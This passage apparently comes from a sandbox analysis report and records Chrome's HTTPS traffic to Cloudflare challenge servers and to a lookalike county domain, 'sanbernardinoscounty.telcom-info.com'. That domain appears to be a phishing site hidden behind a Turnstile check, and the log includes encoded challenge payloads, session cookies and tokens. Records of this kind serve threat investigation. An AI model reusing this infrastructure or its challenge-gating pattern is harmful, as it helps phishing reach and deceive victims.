                                                                          2024-10-01 22:43:06 UTC16384OUTData Raw: 76 5f 38 63 62 66 66 37 64 30 31 39 36 32 63 33 33 64 3d 25 32 62 66 55 5a 52 7a 78 53 62 6d 62 43 59 39 4a 4e 4b 4e 37 6d 55 78 68 78 41 4e 36 4e 75 32 75 31 4e 57 4e 57 2d 68 68 55 43 53 34 78 39 4e 59 44 57 71 4e 74 75 4e 57 47 4e 39 53 78 51 4e 74 68 44 7a 31 4e 2d 37 5a 7a 4b 4e 4a 44 43 37 72 2d 71 73 75 4e 64 78 4e 57 42 61 61 5a 7a 30 4a 4e 32 5a 39 6a 51 71 77 43 52 43 31 4e 67 47 69 6f 6e 47 71 6c 4b 49 66 75 4e 57 47 64 62 78 63 6d 6d 7a 6f 32 4e 50 79 43 47 79 4e 6e 5a 39 77 4e 6a 73 51 69 4e 47 34 45 77 32 4e 58 78 4e 6f 74 55 6f 7a 44 68 55 4e 6f 77 32 55 70 37 32 43 69 78 44 79 4e 4b 73 5a 66 63 50 71 4e 78 44 78 43 76 73 6a 72 4e 39 71 4e 77 68 24 6f 77 32 73 50 64 2b 68 66 4e 75 61 79 61 41 75 63 4c 67 41 4c 73 64 62 55 31 74 34 7a 48 54
                                                                          Data Ascii: v_8cbff7d01962c33d=%2bfUZRzxSbmbCY9JNKN7mUxhxAN6Nu2u1NWNW-hhUCS4x9NYDWqNtuNWGN9SxQNthDz1N-7ZzKNJDC7r-qsuNdxNWBaaZz0JN2Z9jQqwCRC1NgGionGqlKIfuNWGdbxcmmzo2NPyCGyNnZ9wNjsQiNG4Ew2NXxNotUozDhUNow2Up72CixDyNKsZfcPqNxDxCvsjrN9qNwh$ow2sPd+hfNuayaAucLgALsdbU1t4zHT
                                                                          2024-10-01 22:43:06 UTC16384OUTData Raw: 75 7a 72 31 75 32 75 79 4e 4e 7a 65 2b 64 45 31 6a 54 7a 75 79 5a 4e 49 66 64 32 64 59 43 47 44 38 5a 57 34 5a 6d 55 59 5a 78 70 46 45 65 2b 62 7a 66 4e 5a 4e 34 4e 77 5a 43 54 5a 54 66 58 52 6d 34 5a 33 68 43 5a 78 71 62 4c 54 41 32 4e 62 4e 43 4e 7a 57 41 53 4e 45 4e 75 55 7a 79 4e 6c 79 78 44 7a 68 4e 7a 5a 64 62 4e 5a 4e 30 5a 6f 62 4e 4c 4e 4a 4e 55 59 78 4d 4a 69 5a 37 59 78 32 4e 74 5a 7a 4e 4e 50 4e 4d 5a 75 66 78 66 78 4a 5a 6f 4e 57 4c 4e 31 4e 55 5a 7a 62 4e 4c 4e 7a 61 78 55 4e 33 4e 4e 32 7a 79 5a 4b 4e 39 4e 78 55 4e 79 32 64 68 7a 4a 4e 4f 44 78 4a 4e 77 4e 37 2b 64 44 4e 7a 4e 6a 5a 7a 4e 43 79 4e 4f 61 4e 32 39 68 4e 56 5a 7a 62 43 77 5a 42 4e 72 62 78 69 5a 63 66 77 59 43 4a 78 6a 5a 39 32 39 47 44 53 4e 55 44 43 54 5a 6c 4e 37 44 7a 4a
                                                                          Data Ascii: uzr1u2uyNNze+dE1jTzuyZNIfd2dYCGD8ZW4ZmUYZxpFEe+bzfNZN4NwZCTZTfXRm4Z3hCZxqbLTA2NbNCNzWASNENuUzyNlyxDzhNzZdbNZN0ZobNLNJNUYxMJiZ7Yx2NtZzNNPNMZufxfxJZoNWLN1NUZzbNLNzaxUN3NN2zyZKN9NxUNy2dhzJNODxJNwN7+dDNzNjZzNCyNOaN29hNVZzbCwZBNrbxiZcfwYCJxjZ929GDSNUDCTZlN7DzJ
                                                                          2024-10-01 22:43:06 UTC1093OUTData Raw: 47 4a 6a 31 75 66 4e 6f 65 36 31 57 75 6c 39 72 32 77 47 59 4e 61 65 4d 65 61 4b 47 33 5a 4b 39 4e 77 4e 5a 46 4a 6f 43 37 78 71 61 59 71 43 39 47 2d 33 46 59 62 4f 72 59 5a 78 59 78 46 65 6d 6b 62 6a 46 72 36 50 65 36 78 61 5a 44 61 34 50 65 38 71 49 42 4d 59 46 39 38 49 57 38 33 72 53 6f 32 6d 4e 55 62 43 41 47 70 61 56 43 7a 56 74 74 4a 4a 45 38 72 36 55 6e 73 54 31 51 65 48 62 4c 24 72 46 43 36 66 76 6c 57 4a 78 41 67 4d 5a 78 7a 32 4a 59 56 39 53 46 2d 4b 66 63 6c 39 57 4e 47 37 7a 4a 74 79 52 6e 6c 50 4e 53 24 2b 67 5a 75 43 5a 79 4e 74 77 64 7a 53 2b 57 33 77 64 66 42 24 4b 2d 4e 6a 4a 7a 44 5a 5a 55 45 31 4e 79 4e 70 4e 6a 62 78 78 61 31 55 37 4c 4b 48 46 6f 39 63 34 62 77 4e 63 5a 78 64 4e 6c 48 51 32 75 32 6e 5a 4e 76 65 73 68 78 6d 4e 78 31 72
                                                                          Data Ascii: GJj1ufNoe61Wul9r2wGYNaeMeaKG3ZK9NwNZFJoC7xqaYqC9G-3FYbOrYZxYxFemkbjFr6Pe6xaZDa4Pe8qIBMYF98IW83rSo2mNUbCAGpaVCzVttJJE8r6UnsT1QeHbL$rFC6fvlWJxAgMZxz2JYV9SF-Kfcl9WNG7zJtyRnlPNS$+gZuCZyNtwdzS+W3wdfB$K-NjJzDZZUE1NyNpNjbxxa1U7LKHFo9c4bwNcZxdNlHQ2u2nZNveshxmNx1r
                                                                          2024-10-01 22:43:07 UTC1291INHTTP/1.1 200 OK
                                                                          Date: Tue, 01 Oct 2024 22:43:07 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Content-Length: 6152
                                                                          Connection: close
                                                                          cf-chl-out: FVdQ96kVQk2JUwrxJeW5qvFv8uv9KpeBxXIXaNgQqy30GYD62Ss+U8hBIL9J8unCjG9jV+IVbCYVHXy0wVgdyqVKPnA5r+YdwmBABz7FwdxjZ3DO48ruAw==$EcV/tNHiRfVo5Gnb
                                                                          cf-chl-out-s: xBPnExNbgMC5VaYr161pJz5wPntMQIRH6RfkkdWv/H3Cx3P63QJoko3hsbemTa+OdXMphqOjGT0tlF2+WhAg1LODjZqn75UDXh2Z5388KP86F/0UI2xvPR2yTPDOb6rIkNvWiDG356DVNvKkAN/LySQ+au+vJjrUpTReljWAkJca9DGZcbXv8En2NpqhIcu45yo/Bl8mJ1ZYPEKbXBrxsxEgZ1XLEtQ2EYvXojRQrNGE5ENucsOOpdUod49Rfkg6Sdep88BTkRZ1/xGyODKnZB1+Vom9wuA99lhGWG8SqroWChgi5zFHbEwJid6RFE6DwW1DcnqX5J33GjuDjqqP546O287nPZOMpQ/Ev5U6VWsnP4raU15TQaxSwKwEjdIxYWq/OaDcBCNC93UvNScNjwFQU8rhqkG01nRDIEtBO+maTxd4SwpiUyOtr8WKkyUohk705j0uTABPwSV0qY5c+zuBwH0E2pWK8tBMREtHwKfuNdCnEmZKK183yX9c2DrHpYjogIJ8O9JKcXqbXZ/R0J4hOqawM2gb0r3ODVqpnd9X6fJRnJZxauCGB6MEbEfKRRkdMtFfu6tru+BKCLKeSTDs5WHqHiUpbcdBnT3z4+23Uf9W8HsdRC7uqBTBZgP4TcKWC7PDgOFgMLOmDrcbQd/PtoGnEnhgaz9ig4AsWKTLJDoFYFfXD5SBxDbDn1dLS7NpWiIrm5UUV1N99VqKuTiZd65DCjhpkII0uHc/0wbbPjYCtfoJBftjMOKZSbztnOSTYB2GAWk15rQcKRCD6hfa9mJg9HTX0E0KKkd+rqX1PXc+AOkdopXFNJHiw/tqcnnL0jvW4plMfQ/1DA2pD1Qx5F+lb138EvKipVyYITrEP46xUzD4Y4jnYepNbwGQn2OiVHdesJad3teFTFz3uNU=$0UoAM8clo12nWnwK
                                                                          Server: cloudflare
                                                                          CF-RAY: 8cbff840fad65e5f-EWR
                                                                          2024-10-01 22:43:07 UTC78INData Raw: 64 58 4a 6d 62 57 35 38 69 58 4f 51 6c 35 46 35 6b 71 53 53 6f 31 6c 6f 59 34 61 71 6c 34 42 2f 72 4b 75 69 62 49 61 50 72 35 36 67 6d 5a 70 78 71 35 47 64 65 4a 4b 4c 75 37 69 73 66 35 75 55 73 49 4f 65 69 62 6d 61 6a 59 54 43 6f 62
                                                                          Data Ascii: dXJmbW58iXOQl5F5kqSSo1loY4aql4B/rKuibIaPr56gmZpxq5GdeJKLu7isf5uUsIOeibmajYTCob
                                                                          2024-10-01 22:43:07 UTC1369INData Raw: 2b 4d 70 64 58 50 79 38 71 53 6b 71 72 4b 6c 39 47 2b 76 73 44 50 6e 4c 6d 76 33 38 37 62 74 36 6d 6f 32 38 75 6f 71 4d 54 78 36 39 33 6e 78 4c 37 6b 36 65 76 32 31 4e 44 39 32 62 7a 4f 34 64 61 34 39 2b 58 58 30 66 66 6a 38 38 48 68 44 51 4c 70 41 50 45 42 7a 51 48 30 34 2b 63 46 31 41 37 36 38 42 37 78 33 50 48 78 2b 74 67 57 34 42 55 57 47 41 6f 41 42 68 73 4e 47 67 41 75 49 50 37 79 4c 42 59 6f 4e 52 49 35 38 54 51 6b 48 54 55 36 4c 52 55 58 4e 30 55 4e 46 51 59 49 51 42 77 5a 42 45 4a 47 51 79 34 48 51 42 73 51 48 6b 6f 6b 54 6b 52 62 47 56 68 56 53 78 78 57 4f 7a 5a 56 55 7a 56 61 4f 42 6f 31 58 31 55 36 54 55 78 65 59 6b 34 36 62 45 39 56 63 6b 68 67 62 7a 4a 6c 63 69 39 57 57 46 31 36 58 46 39 6c 56 58 6c 47 67 48 64 59 65 59 78 61 52 31 6c 67 57
                                                                          Data Ascii: +MpdXPy8qSkqrKl9G+vsDPnLmv387bt6mo28uoqMTx693nxL7k6ev21ND92bzO4da49+XX0ffj88HhDQLpAPEBzQH04+cF1A768B7x3PHx+tgW4BUWGAoABhsNGgAuIP7yLBYoNRI58TQkHTU6LRUXN0UNFQYIQBwZBEJGQy4HQBsQHkokTkRbGVhVSxxWOzZVUzVaOBo1X1U6TUxeYk46bE9VckhgbzJlci9WWF16XF9lVXlGgHdYeYxaR1lgW
                                                                          2024-10-01 22:43:07 UTC1369INData Raw: 59 79 36 71 6c 74 61 58 4f 72 4a 4c 4c 73 61 2b 75 31 38 47 6e 35 74 2b 38 76 62 54 45 32 62 79 69 72 4d 53 6c 76 4e 37 73 79 4d 44 32 74 62 72 45 39 38 75 2f 37 72 2b 34 77 67 58 5a 32 73 49 49 33 50 72 48 76 67 67 4f 32 77 34 49 42 2b 45 42 37 41 37 4a 42 2f 6b 4f 37 41 30 51 2f 64 67 65 44 50 50 30 2f 4e 38 6d 35 43 51 6a 47 2b 6b 44 43 69 44 73 38 44 41 6e 37 6a 55 4a 4b 2f 45 43 41 69 62 36 42 7a 41 70 44 78 77 52 4f 67 4d 50 48 55 51 59 52 6a 73 2b 46 53 64 44 53 78 6b 61 4a 6b 6b 53 4c 79 34 6f 4a 45 63 32 4d 68 70 61 4e 56 49 79 4b 54 55 63 4d 43 34 79 50 54 46 59 50 6d 6f 32 62 46 67 35 50 6c 34 6f 62 6b 46 78 62 45 77 32 4c 32 52 59 54 53 39 64 65 31 46 2f 58 6c 77 32 58 46 70 79 56 57 4e 7a 66 30 65 49 6a 30 64 51 6a 6e 2b 4c 5a 6d 78 32 61 32
                                                                          Data Ascii: Yy6qltaXOrJLLsa+u18Gn5t+8vbTE2byirMSlvN7syMD2tbrE98u/7r+4wgXZ2sII3PrHvggO2w4IB+EB7A7JB/kO7A0Q/dgeDPP0/N8m5CQjG+kDCiDs8DAn7jUJK/ECAib6BzApDxwROgMPHUQYRjs+FSdDSxkaJkkSLy4oJEc2MhpaNVIyKTUcMC4yPTFYPmo2bFg5Pl4obkFxbEw2L2RYTS9de1F/Xlw2XFpyVWNzf0eIj0dQjn+LZmx2a2
                                                                          2024-10-01 22:43:07 UTC1369INData Raw: 6e 61 6e 4c 77 5a 37 69 7a 37 36 34 77 4f 50 68 70 4e 71 6b 34 38 43 6d 32 2b 69 78 37 2b 76 4a 77 63 43 76 75 62 66 36 32 63 2f 54 37 4c 75 36 7a 74 79 37 76 73 41 46 34 4d 54 47 2b 77 44 69 79 41 77 49 36 74 45 54 42 38 37 52 34 76 67 4d 31 42 6b 4d 2b 4e 45 4e 2f 51 4c 74 2b 2f 54 67 35 42 59 63 43 76 6f 5a 46 79 6a 34 43 78 48 72 37 6a 45 4a 4d 66 4d 50 2b 44 6f 4e 37 76 77 76 2f 54 35 41 51 67 48 32 4a 55 4d 46 49 68 55 49 43 43 55 33 51 51 49 5a 51 43 55 52 4b 7a 46 53 46 44 4d 78 45 78 74 5a 48 46 55 63 54 6d 42 41 49 53 56 66 5a 44 6c 61 4e 6b 6f 70 49 7a 34 2b 4d 43 64 53 53 43 6f 6e 55 6c 59 30 4b 31 6c 30 53 31 64 4f 55 54 35 2f 56 54 6c 44 63 56 35 58 51 6d 4a 57 69 6b 6c 56 69 34 4a 63 52 30 6d 4b 5a 56 57 55 63 6c 56 76 63 56 68 59 6a 59 2b
                                                                          Data Ascii: nanLwZ7iz764wOPhpNqk48Cm2+ix7+vJwcCvubf62c/T7Lu6zty7vsAF4MTG+wDiyAwI6tETB87R4vgM1BkM+NEN/QLt+/Tg5BYcCvoZFyj4CxHr7jEJMfMP+DoN7vwv/T5AQgH2JUMFIhUICCU3QQIZQCURKzFSFDMxExtZHFUcTmBAISVfZDlaNkopIz4+MCdSSConUlY0K1l0S1dOUT5/VTlDcV5XQmJWiklVi4JcR0mKZVWUclVvcVhYjY+
                                                                          2024-10-01 22:43:07 UTC1369INData Raw: 36 4b 6e 32 4e 76 61 71 75 7a 62 32 4d 44 74 32 76 4c 45 34 64 53 79 79 50 58 4d 2b 72 71 79 30 65 6d 2b 38 4e 53 39 30 37 72 33 2b 4e 66 34 32 66 33 64 2b 65 77 50 7a 68 48 70 42 75 54 65 42 41 72 58 46 75 6b 4c 37 50 62 39 45 65 38 52 45 42 54 30 32 68 67 59 2b 50 49 62 34 2f 72 32 43 69 54 68 43 78 77 65 42 67 38 57 49 67 63 54 44 66 55 6f 45 67 73 50 45 79 6f 52 44 54 77 45 41 44 67 53 48 77 42 45 2f 54 6b 4d 48 69 39 47 54 53 6f 7a 4c 6a 45 4a 4e 55 6b 71 55 69 73 33 4d 68 6b 34 59 44 34 2f 4d 79 35 63 53 44 64 61 58 46 63 34 62 46 78 6b 53 53 68 78 55 6b 52 32 4e 54 46 52 61 6a 4a 5a 56 47 39 4b 50 6b 39 4b 55 6d 4a 62 65 46 5a 63 5a 57 4a 4a 53 6d 4b 4d 54 56 68 65 61 33 4a 7a 5a 6d 43 49 56 33 4e 7a 59 6f 5a 78 6a 48 35 39 66 61 42 5a 59 48 39 2f
                                                                          Data Ascii: 6Kn2Nvaquzb2MDt2vLE4dSyyPXM+rqy0em+8NS907r3+Nf42f3d+ewPzhHpBuTeBArXFukL7Pb9Ee8REBT02hgY+PIb4/r2CiThCxweBg8WIgcTDfUoEgsPEyoRDTwEADgSHwBE/TkMHi9GTSozLjEJNUkqUis3Mhk4YD4/My5cSDdaXFc4bFxkSShxUkR2NTFRajJZVG9KPk9KUmJbeFZcZWJJSmKMTVhea3JzZmCIV3NzYoZxjH59faBZYH9/
                                                                          2024-10-01 22:43:07 UTC598INData Raw: 53 6c 7a 4d 7a 78 33 36 7a 4f 7a 75 4f 7a 79 64 48 6a 35 4d 33 72 31 66 48 56 79 64 4c 66 32 63 33 6c 2b 75 4c 54 39 4f 76 6c 31 63 33 65 35 39 7a 75 32 75 63 48 38 75 62 78 43 74 51 4d 39 41 7a 56 38 2f 66 35 49 4e 6a 34 41 51 49 59 2b 66 4c 32 2b 76 73 49 43 2f 59 49 43 68 77 54 43 77 44 30 37 67 77 35 4c 42 41 53 47 54 30 55 44 52 34 61 4f 79 45 53 4f 44 34 5a 49 77 6b 44 47 53 6b 57 55 43 78 43 43 54 30 78 44 41 34 33 4a 6c 68 45 46 54 4e 4e 4a 7a 51 77 4c 6b 77 6a 50 7a 42 51 55 54 6c 44 49 6a 52 43 62 6b 35 50 51 6d 42 67 55 45 74 30 52 31 46 56 4c 7a 56 63 57 57 31 65 57 6c 31 63 58 6a 31 55 55 6c 39 69 58 6c 57 41 51 6d 4b 41 67 48 64 69 61 6e 4e 6e 62 49 65 4a 5a 6b 36 48 6d 48 74 70 6a 35 46 71 61 33 6d 68 62 58 46 63 67 33 64 31 63 6f 71 49 65
                                                                          Data Ascii: SlzMzx36zOzuOzydHj5M3r1fHVydLf2c3l+uLT9Ovl1c3e59zu2ucH8ubxCtQM9AzV8/f5INj4AQIY+fL2+vsIC/YIChwTCwD07gw5LBASGT0UDR4aOyESOD4ZIwkDGSkWUCxCCT0xDA43JlhEFTNNJzQwLkwjPzBQUTlDIjRCbk5PQmBgUEt0R1FVLzVcWW1eWl1cXj1UUl9iXlWAQmKAgHdianNnbIeJZk6HmHtpj5Fqa3mhbXFcg3d1coqIe


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          26192.168.2.649757104.18.94.414434864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-01 22:43:07 UTC487OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/1121365584:1727821582:FtjyX9VbAvqmLS5-UuL06udmIDQT7dp1rW-1y8F4S1Y/8cbff7d01962c33d/bcbf9bd71f426c2 HTTP/1.1
                                                                          Host: challenges.cloudflare.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-10-01 22:43:07 UTC349INHTTP/1.1 404 Not Found
                                                                          Date: Tue, 01 Oct 2024 22:43:07 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 7
                                                                          Connection: close
                                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                          cf-chl-out: u7lAuu4eLQraXN80ERw77e6sFA+M0ONH8pc=$YoML+a8rvAYgi7V1
                                                                          Server: cloudflare
                                                                          CF-RAY: 8cbff845b8b50cac-EWR
                                                                          2024-10-01 22:43:07 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                          Data Ascii: invalid


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          27192.168.2.649758104.21.55.674434864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-01 22:43:08 UTC763OUTPOST /cdn-cgi/challenge-platform/h/g/rc/8cbff7d01962c33d HTTP/1.1
                                                                          Host: sanbernardinoscounty.telcom-info.com
                                                                          Connection: keep-alive
                                                                          Content-Length: 938
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-platform: "Windows"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Content-Type: application/json
                                                                          Accept: */*
                                                                          Origin: https://sanbernardinoscounty.telcom-info.com
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Referer: https://sanbernardinoscounty.telcom-info.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: PHPSESSID=d2b586c48e6c37e4b46c75c985eb61c5
                                                                          2024-10-01 22:43:08 UTC938OUTData Raw: 7b 22 73 69 74 65 6b 65 79 22 3a 22 30 78 34 41 41 41 41 41 41 41 77 67 6f 5f 34 73 55 34 52 37 42 6c 73 41 22 2c 22 73 65 63 6f 6e 64 61 72 79 54 6f 6b 65 6e 22 3a 22 30 2e 76 42 45 49 43 57 63 31 30 48 4a 35 4e 55 4e 33 34 47 67 78 77 43 6f 57 66 69 76 62 6d 68 48 32 37 6e 72 39 71 4f 68 6b 4f 2d 35 46 34 44 55 69 79 4c 49 56 36 36 77 49 6a 79 46 41 59 66 37 52 33 51 73 5a 56 6a 48 2d 31 72 4b 30 37 74 42 31 52 43 4f 66 41 64 74 4a 51 35 41 68 74 4d 73 55 4f 5f 33 75 65 41 54 66 69 39 31 6b 5a 4c 4d 73 79 2d 56 62 67 77 67 47 79 39 4c 6f 67 55 59 66 2d 57 57 50 2d 4d 59 43 6e 4c 4f 59 4d 6e 45 79 73 42 44 70 59 63 46 32 61 4f 64 68 65 53 62 6a 6f 76 36 36 6f 36 61 51 48 57 62 61 51 6f 44 4f 48 37 52 55 75 6a 62 6b 59 56 53 57 4e 79 57 37 50 6d 45 66 66
                                                                          Data Ascii: {"sitekey":"0x4AAAAAAAwgo_4sU4R7BlsA","secondaryToken":"0.vBEICWc10HJ5NUN34GgxwCoWfivbmhH27nr9qOhkO-5F4DUiyLIV66wIjyFAYf7R3QsZVjH-1rK07tB1RCOfAdtJQ5AhtMsUO_3ueATfi91kZLMsy-VbgwgGy9LogUYf-WWP-MYCnLOYMnEysBDpYcF2aOdheSbjov66o6aQHWbaQoDOH7RUujbkYVSWNyW7PmEff
                                                                          2024-10-01 22:43:08 UTC1363INHTTP/1.1 200 OK
                                                                          Date: Tue, 01 Oct 2024 22:43:08 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 21
                                                                          Connection: close
                                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                          Set-Cookie: cf_clearance=; Path=/; Expires=Thu, 01-Jan-70 00:00:00 GMT; Domain=.telcom-info.com; HttpOnly; Secure; SameSite=None
                                                                          Set-Cookie: cf_clearance=WI3_X5Q8DqvBE7vRfDhgGrfo36.yzEAQnX7Fkgx1WLQ-1727822588-1.2.1.1-yVg.R8iXsSEyCdH6mpk7OwykeKWYET9_iK56vfB.G.m9J4LJqn2mjEGUcz_hgM6junbyj03Eoeyxghf7DKwQjnOHT_RV.dkyB8YOhZsRNoePwI64pJc2MVeitRkAjjMCWVl2FXYkhZ1d5WMaB4mbRLrIyh9e4TcPrwbqn58bq2kyq5mT_1oGYdVeO_3cvXt7CVTKoxVr8szlJlVf52OJy0NaLZzpmkKC87R2prCuqoJXWnwmag_1iRpA8JVYZTUVIx36Rn8K_V4I5xYC16R4Ea6wqGO2bZTTQXYUd7Ww2ArPF_on1ymBOKV6N_LGXJnc8r2nfHBk87oT30hKH5frHigjIy8ou5a2XpE4K4plr4D3fDah52V2p9j2UGAz6XwAu8c436H48fmfZT7BOzmQtT8s1xW6OSO7to8bPnw.0eUBWkz5qzk0jmBG3bn07J.o; Path=/; Expires=Wed, 01-Oct-25 22:43:08 GMT; Domain=.telcom-info.com; HttpOnly; Secure; SameSite=None; Partitioned
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aGPTf%2FL7diW5GzgXB6iQQubQ6kTTxtGBpO%2F1xDoamiwuZ60Bw%2FMAi4oheXfXi%2B1vPnmhhlGbaFXCjahwg2zjx5HVtgvisIFgvQJkKFd2djtF2zbJolfwyOxIWJ4kJWIbToxCwaz8qTvU0CrcuMohpGEbrZagnWg%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          2024-10-01 22:43:08 UTC52INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 62 66 66 38 34 38 38 39 30 30 38 63 61 62 2d 45 57 52 0d 0a 0d 0a
                                                                          Data Ascii: Server: cloudflareCF-RAY: 8cbff84889008cab-EWR
                                                                          2024-10-01 22:43:08 UTC21INData Raw: 7b 22 73 74 61 74 75 73 22 3a 22 72 65 64 65 65 6d 65 64 22 7d
                                                                          Data Ascii: {"status":"redeemed"}


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          28192.168.2.649761104.21.55.674434864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-01 22:43:09 UTC1337OUTPOST /em9XWWsyOWNaZkNyVjZorobotem9XWWsyOWNaZkNyVjZo HTTP/1.1
                                                                          Host: sanbernardinoscounty.telcom-info.com
                                                                          Connection: keep-alive
                                                                          Content-Length: 1105
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-platform: "Windows"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAB4KZh5oK0QDZhk9
                                                                          Accept: */*
                                                                          Origin: https://sanbernardinoscounty.telcom-info.com
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Referer: https://sanbernardinoscounty.telcom-info.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: PHPSESSID=d2b586c48e6c37e4b46c75c985eb61c5; cf_clearance=WI3_X5Q8DqvBE7vRfDhgGrfo36.yzEAQnX7Fkgx1WLQ-1727822588-1.2.1.1-yVg.R8iXsSEyCdH6mpk7OwykeKWYET9_iK56vfB.G.m9J4LJqn2mjEGUcz_hgM6junbyj03Eoeyxghf7DKwQjnOHT_RV.dkyB8YOhZsRNoePwI64pJc2MVeitRkAjjMCWVl2FXYkhZ1d5WMaB4mbRLrIyh9e4TcPrwbqn58bq2kyq5mT_1oGYdVeO_3cvXt7CVTKoxVr8szlJlVf52OJy0NaLZzpmkKC87R2prCuqoJXWnwmag_1iRpA8JVYZTUVIx36Rn8K_V4I5xYC16R4Ea6wqGO2bZTTQXYUd7Ww2ArPF_on1ymBOKV6N_LGXJnc8r2nfHBk87oT30hKH5frHigjIy8ou5a2XpE4K4plr4D3fDah52V2p9j2UGAz6XwAu8c436H48fmfZT7BOzmQtT8s1xW6OSO7to8bPnw.0eUBWkz5qzk0jmBG3bn07J.o
                                                                          2024-10-01 22:43:09 UTC1105OUTData Raw: 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 41 42 34 4b 5a 68 35 6f 4b 30 51 44 5a 68 6b 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 72 65 73 70 6f 6e 73 65 22 0d 0a 0d 0a 30 2e 44 70 5a 37 4b 79 6c 30 54 62 76 4b 47 32 78 62 5f 50 6a 4e 50 79 68 47 47 73 57 4c 31 4b 35 7a 49 37 37 67 34 6e 7a 4b 54 4f 58 77 51 55 2d 69 61 49 4f 61 7a 73 67 72 45 48 7a 7a 4c 6f 54 61 78 31 73 7a 74 42 65 71 47 54 6d 67 75 65 47 39 76 6b 51 31 66 72 72 68 70 6f 2d 37 6f 32 6e 58 2d 6b 71 6e 75 4c 5a 71 56 70 64 54 4a 74 70 69 71 33 61 62 6e 74 71 58 41 6b 7a 6f 36 2d 47 6b 62 57 67 66 49 5f 71 47 77 71 6b 39 32 4a 6f 52 5f 6d 70
                                                                          Data Ascii: ------WebKitFormBoundaryAB4KZh5oK0QDZhk9Content-Disposition: form-data; name="cf-turnstile-response"0.DpZ7Kyl0TbvKG2xb_PjNPyhGGsWL1K5zI77g4nzKTOXwQU-iaIOazsgrEHzzLoTax1sztBeqGTmgueG9vkQ1frrhpo-7o2nX-kqnuLZqVpdTJtpiq3abntqXAkzo6-GkbWgfI_qGwqk92JoR_mp
                                                                          2024-10-01 22:43:10 UTC688INHTTP/1.1 200 OK
                                                                          Date: Tue, 01 Oct 2024 22:43:10 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                          Pragma: no-cache
                                                                          cf-cache-status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XozeyNmwqRBbyrzaYt%2F2W0OEEneqxv2qPSP%2FWbNTkBO7f%2BHn9tsw9XaoCBiIlxmCYqGaamgmpGbKWqtdiu8jjz%2BXAlIYpv940fo0gigkak3AjlydzmxNzMYrh082%2FQy3I0GK%2Btj3I9L0puMCeZBiTF6xB4PfCYo%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8cbff8500d5d422d-EWR
                                                                          2024-10-01 22:43:10 UTC35INData Raw: 31 64 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 75 72 6c 22 3a 22 22 7d 0d 0a
                                                                          Data Ascii: 1d{"status":"success","url":""}
                                                                          2024-10-01 22:43:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          29192.168.2.649762104.21.55.674434864C:\Program Files\Google\Chrome\Application\chrome.exe
